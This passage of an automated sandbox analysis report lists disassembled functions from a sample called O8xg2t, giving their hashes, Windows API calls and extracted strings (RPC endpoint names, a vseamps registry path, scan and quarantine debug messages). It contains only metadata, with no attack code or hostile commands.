                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3424473247-996641649
                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1775797328-0
                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 1232609184-0
                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                  • String ID: H
                                  • API String ID: 2107338056-2852464175
                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                  • API String ID: 1322048431-2685357988
                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                  • API String ID: 2984211723-3002863673
                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                  • API String ID: 678758403-4129911376
                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3424473247-0
                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                  • String ID: bad exception$csm$csm$csm
                                  • API String ID: 3766904988-820278400
                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                  • String ID:
                                  • API String ID: 2707001247-0
                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction ID: d4a1f2c31889616e877b7024582679f8314bc1f48c562e475dd94acb6948fe42
                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction Fuzzy Hash: F0D19FB6B097428AEB209F75D4403AEB7A0FB45788F146135EE8D67B95DF38E491CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3013587201-537541572
                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction ID: a062cb52ae0fa94b7fb43ae1d45aefe63a836313908353468bb8b1c45ff6a9cd
                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction Fuzzy Hash: 654118A9B1AA0255EB16CF36DA205BB2391BF09B90F48A535DD1E67794DF3CE405CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 1119674940-1966266597
                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3702919091-996641649
                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                  • String ID:
                                  • API String ID: 3103264659-0
                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                  • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Info
                                  • String ID:
                                  • API String ID: 1775632426-0
                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71B1
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71BF
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA71E9
                                  • FreeLibrary.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA7257
                                  • GetProcAddress.KERNEL32(?,?,?,00007FFBC1BA72EB,?,?,?,00007FFBC1BA3EC0,?,?,?,?,00007FFBC1BA3CFD), ref: 00007FFBC1BA7263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction ID: ffeb1a035198ed494dd794462f4705eaa4138285bbf04c8e24d7c32cf5df6209
                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction Fuzzy Hash: 2031F4A9B1FB4191EF129F22E4105BA23D4BF49B60F595535ED1D27750EE3CE4458B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction ID: fcc205c091ddb99f307a55c06a5f85bfa6e44c63f82ac463298a38d9a831066d
                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
